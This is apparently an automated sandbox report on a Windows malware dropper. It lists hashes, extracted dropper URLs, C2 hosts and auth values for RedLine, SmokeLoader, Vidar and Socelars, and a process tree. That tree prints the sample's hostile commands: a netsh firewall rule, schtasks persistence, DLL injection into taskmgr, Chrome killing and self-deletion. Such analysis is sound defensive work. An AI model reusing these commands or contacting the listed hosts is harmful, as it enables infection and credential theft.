Analysis

  • max time kernel
    74s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    10-03-2022 03:40

General

  • Target

    695d1a9ccec5fd602017c19e77075ce9d0e011d13105a6c3ffe542ee583e814c.exe

  • Size

    8.0MB

  • MD5

    ec37baa0a4d93c4d4e714ad33258a5d3

  • SHA1

    c7791210ed1dd2964d318c5f571a498ddde2e27b

  • SHA256

    695d1a9ccec5fd602017c19e77075ce9d0e011d13105a6c3ffe542ee583e814c

  • SHA512

    825dedeed88a4eb71a12582de53e944454eeb6e29f99e7f1c21ab44e501282e3ccf2ab1b611a147cebdc04f6c139715ebe465ad0d317faa04831a0331265e3ef

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

fdfsdf

C2

86.107.197.196:63065

Attributes
  • auth_value

    49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

redline

Botnet

Travis

C2

5.182.5.22:33809

Attributes
  • auth_value

    6fa3251b9d70327e7d1e5851c226af23

Extracted

Family

redline

Botnet

jack

C2

5.182.5.203:33873

Attributes
  • auth_value

    6d03d90d7d897b871fe8bfcaec8c6ae0

Extracted

Family

vidar

Version

50.6

Botnet

937

C2

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

ruzki (check bio)

C2

103.133.111.182:44839

Attributes
  • auth_value

    767fa45398d3ac4a23de20d0480c2b03

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • OnlyLogger Payload 1 IoCs
  • Vidar Stealer 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 34 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 64 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\695d1a9ccec5fd602017c19e77075ce9d0e011d13105a6c3ffe542ee583e814c.exe
    "C:\Users\Admin\AppData\Local\Temp\695d1a9ccec5fd602017c19e77075ce9d0e011d13105a6c3ffe542ee583e814c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3352
    • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
      "C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3364
    • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
      "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
      2⤵
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of AdjustPrivilegeToken
      PID:3276
    • C:\Users\Admin\AppData\Local\Temp\Folder.exe
      "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1104
      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
        3⤵
        • Executes dropped EXE
        PID:1268
    • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
      "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3036
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 328
        3⤵
        • Program crash
        PID:3116
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 332
        3⤵
        • Program crash
        PID:2812
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 332
        3⤵
        • Program crash
        PID:404
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 664
        3⤵
        • Program crash
        PID:3636
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 664
        3⤵
        • Program crash
        PID:3352
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 664
        3⤵
        • Program crash
        PID:4076
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 664
        3⤵
        • Program crash
        PID:1944
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 728
        3⤵
        • Program crash
        PID:1432
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 748
        3⤵
        • Program crash
        PID:2600
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 876
        3⤵
        • Program crash
        PID:640
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 812
        3⤵
        • Program crash
        PID:2704
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 744
        3⤵
        • Program crash
        PID:3044
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 760
        3⤵
        • Program crash
        PID:404
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 880
        3⤵
        • Program crash
        PID:3508
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 748
        3⤵
        • Program crash
        PID:536
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 748
        3⤵
        • Program crash
        PID:2864
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 812
        3⤵
        • Program crash
        PID:3900
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 824
        3⤵
        • Program crash
        PID:852
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 820
        3⤵
        • Program crash
        PID:3236
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 916
        3⤵
        • Program crash
        PID:864
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 744
        3⤵
        • Program crash
        PID:3800
      • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
        "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 292
          4⤵
          • Program crash
          PID:1840
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 296
          4⤵
          • Program crash
          PID:532
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 296
          4⤵
          • Program crash
          PID:3352
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 628
          4⤵
          • Program crash
          PID:652
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 628
          4⤵
          • Program crash
          PID:3824
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 628
          4⤵
          • Program crash
          PID:864
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 700
          4⤵
          • Program crash
          PID:3500
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 708
          4⤵
          • Program crash
          PID:3036
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 712
          4⤵
          • Program crash
          PID:960
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 580
          4⤵
          • Program crash
          PID:2036
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 712
          4⤵
          • Program crash
          PID:2272
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 572
          4⤵
          • Program crash
          PID:3712
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 468
            5⤵
            • Program crash
            PID:4496
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 476
            5⤵
              PID:5048
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 848
            4⤵
            • Program crash
            PID:3464
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 892
            4⤵
            • Program crash
            PID:3756
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 828
            4⤵
            • Program crash
            PID:3308
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 912
            4⤵
            • Program crash
            PID:3284
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3200
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              5⤵
                PID:3836
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe /202-202
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2156
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 328
                5⤵
                • Program crash
                PID:1000
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 332
                5⤵
                • Program crash
                PID:1040
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 332
                5⤵
                • Program crash
                PID:3756
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 668
                5⤵
                • Program crash
                PID:1176
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 668
                5⤵
                • Program crash
                PID:2456
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 668
                5⤵
                • Program crash
                PID:3284
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 668
                5⤵
                • Program crash
                PID:3688
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 732
                5⤵
                • Program crash
                PID:2644
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 756
                5⤵
                • Program crash
                PID:3348
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 744
                5⤵
                • Program crash
                PID:3200
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 880
                5⤵
                • Program crash
                PID:2000
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 632
                5⤵
                • Program crash
                PID:2160
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 632
                5⤵
                • Program crash
                PID:460
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • Creates scheduled task(s)
                PID:3392
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 868
                5⤵
                • Program crash
                PID:3684
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 608
                5⤵
                • Program crash
                PID:1176
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1000
                5⤵
                • Program crash
                PID:1792
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 952
                5⤵
                • Program crash
                PID:3156
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1048
                5⤵
                • Program crash
                PID:1016
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 924
                5⤵
                • Program crash
                PID:3872
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 948
                5⤵
                • Program crash
                PID:2920
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1112
                5⤵
                • Program crash
                PID:3428
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1036
                5⤵
                • Program crash
                PID:536
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1052
                5⤵
                • Program crash
                PID:3240
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1068
                5⤵
                • Program crash
                PID:3584
              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                5⤵
                • Executes dropped EXE
                PID:1268
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1116
                5⤵
                  PID:1628
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1036
                  5⤵
                    PID:1040
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1008
                    5⤵
                      PID:4272
              • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
                "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
                2⤵
                • Executes dropped EXE
                PID:2664
              • C:\Users\Admin\AppData\Local\Temp\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3812
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1776
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    4⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3184
              • C:\Users\Admin\AppData\Local\Temp\Files.exe
                "C:\Users\Admin\AppData\Local\Temp\Files.exe"
                2⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:3136
                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  3⤵
                  • Executes dropped EXE
                  PID:1880
                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2124
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 460
                    4⤵
                    • Program crash
                    PID:4396
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 504
                    4⤵
                      PID:5064
                • C:\Users\Admin\AppData\Local\Temp\pub2.exe
                  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
                  2⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:540
                • C:\Users\Admin\AppData\Local\Temp\File.exe
                  "C:\Users\Admin\AppData\Local\Temp\File.exe"
                  2⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:3676
                  • C:\Users\Admin\Pictures\Adobe Films\U4e3UQLE5FCbDJnvD0hoVRB9.exe
                    "C:\Users\Admin\Pictures\Adobe Films\U4e3UQLE5FCbDJnvD0hoVRB9.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:2244
                  • C:\Users\Admin\Pictures\Adobe Films\1xXpxIQuCKg1RdrFcfKsSL1I.exe
                    "C:\Users\Admin\Pictures\Adobe Films\1xXpxIQuCKg1RdrFcfKsSL1I.exe"
                    3⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Suspicious use of SetWindowsHookEx
                    PID:2752
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                      4⤵
                        PID:3880
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd
                          5⤵
                            PID:1900
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist /FI "imagename eq BullGuardCore.exe"
                              6⤵
                              • Enumerates processes with tasklist
                              PID:4228
                            • C:\Windows\SysWOW64\find.exe
                              find /I /N "bullguardcore.exe"
                              6⤵
                                PID:3960
                        • C:\Users\Admin\Pictures\Adobe Films\XKXl7qQTDHtpneSZP9g0s7gt.exe
                          "C:\Users\Admin\Pictures\Adobe Films\XKXl7qQTDHtpneSZP9g0s7gt.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:540
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im XKXl7qQTDHtpneSZP9g0s7gt.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\XKXl7qQTDHtpneSZP9g0s7gt.exe" & del C:\ProgramData\*.dll & exit
                            4⤵
                              PID:4768
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im XKXl7qQTDHtpneSZP9g0s7gt.exe /f
                                5⤵
                                • Kills process with taskkill
                                PID:4376
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 6
                                5⤵
                                • Delays execution with timeout.exe
                                PID:4488
                          • C:\Users\Admin\Pictures\Adobe Films\pr5pxtkzvDb7nOB1Mg14QFql.exe
                            "C:\Users\Admin\Pictures\Adobe Films\pr5pxtkzvDb7nOB1Mg14QFql.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetWindowsHookEx
                            PID:904
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                              4⤵
                              • Creates scheduled task(s)
                              PID:1368
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                              4⤵
                              • Creates scheduled task(s)
                              PID:4496
                            • C:\Users\Admin\Documents\GPcePzn5qf5iTaJaUhaxQBio.exe
                              "C:\Users\Admin\Documents\GPcePzn5qf5iTaJaUhaxQBio.exe"
                              4⤵
                                PID:4876
                                • C:\Users\Admin\Pictures\Adobe Films\tNoM0w15h1pU1pIkqc3GjUad.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\tNoM0w15h1pU1pIkqc3GjUad.exe"
                                  5⤵
                                    PID:5024
                                  • C:\Users\Admin\Pictures\Adobe Films\jB2BdAbRq2IdZN8j4mFAg07i.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\jB2BdAbRq2IdZN8j4mFAg07i.exe"
                                    5⤵
                                      PID:3744
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 616
                                        6⤵
                                          PID:1012
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 636
                                          6⤵
                                            PID:2844
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 672
                                            6⤵
                                              PID:3284
                                          • C:\Users\Admin\Pictures\Adobe Films\XbDs4xJf_sdBC28tenUdQ1FU.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\XbDs4xJf_sdBC28tenUdQ1FU.exe"
                                            5⤵
                                              PID:1812
                                              • C:\Windows\SysWOW64\control.exe
                                                "C:\Windows\System32\control.exe" .\a6U_WGm.9B
                                                6⤵
                                                  PID:3036
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                                    7⤵
                                                      PID:4804
                                                • C:\Users\Admin\Pictures\Adobe Films\urJ66QG1w2auQCCYGGDYenC8.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\urJ66QG1w2auQCCYGGDYenC8.exe"
                                                  5⤵
                                                    PID:4596
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      6⤵
                                                        PID:1384
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:4984
                                                    • C:\Users\Admin\Pictures\Adobe Films\pvtdfTDwSbJ8G7ETijZxP3C8.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\pvtdfTDwSbJ8G7ETijZxP3C8.exe"
                                                      5⤵
                                                        PID:2420
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSA25.tmp\Install.exe
                                                          .\Install.exe
                                                          6⤵
                                                            PID:4372
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS2C72.tmp\Install.exe
                                                              .\Install.exe /S /site_id "525403"
                                                              7⤵
                                                                PID:4408
                                                          • C:\Users\Admin\Pictures\Adobe Films\bvoYnYvyd1_pAYsD_qyUB5hC.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\bvoYnYvyd1_pAYsD_qyUB5hC.exe"
                                                            5⤵
                                                              PID:3660
                                                            • C:\Users\Admin\Pictures\Adobe Films\HqVvEQwAICqa_jSnFnhb8k2f.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\HqVvEQwAICqa_jSnFnhb8k2f.exe"
                                                              5⤵
                                                                PID:1060
                                                                • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
                                                                  6⤵
                                                                    PID:2036
                                                                  • C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall23410.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall23410.exe"
                                                                    6⤵
                                                                      PID:3940
                                                                    • C:\Users\Admin\AppData\Local\Temp\po50.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\po50.exe"
                                                                      6⤵
                                                                        PID:388
                                                                      • C:\Users\Admin\AppData\Local\Temp\cxy.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\cxy.exe"
                                                                        6⤵
                                                                          PID:4228
                                                                        • C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
                                                                          6⤵
                                                                            PID:1232
                                                                    • C:\Users\Admin\Pictures\Adobe Films\OJuKcgdOzeAzFyiGxD1iZtEm.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\OJuKcgdOzeAzFyiGxD1iZtEm.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:508
                                                                      • C:\Users\Admin\AppData\Local\Temp\22cbec38-a99b-4a2e-9b44-9446ab54430f.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\22cbec38-a99b-4a2e-9b44-9446ab54430f.exe"
                                                                        4⤵
                                                                          PID:4500
                                                                      • C:\Users\Admin\Pictures\Adobe Films\sxwTIXPgbtbD8tclv6F6eE27.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\sxwTIXPgbtbD8tclv6F6eE27.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:536
                                                                      • C:\Users\Admin\Pictures\Adobe Films\aiUuDS3u1WJyCpW_tquswKBN.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\aiUuDS3u1WJyCpW_tquswKBN.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:1636
                                                                      • C:\Users\Admin\Pictures\Adobe Films\nEv2JUsZtPTRDVZ0pU6ZJfpT.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\nEv2JUsZtPTRDVZ0pU6ZJfpT.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:1764
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                          4⤵
                                                                            PID:4960
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im chrome.exe
                                                                              5⤵
                                                                              • Kills process with taskkill
                                                                              PID:3960
                                                                        • C:\Users\Admin\Pictures\Adobe Films\soRTwtGG9awNwAigkgTrbB4M.exe
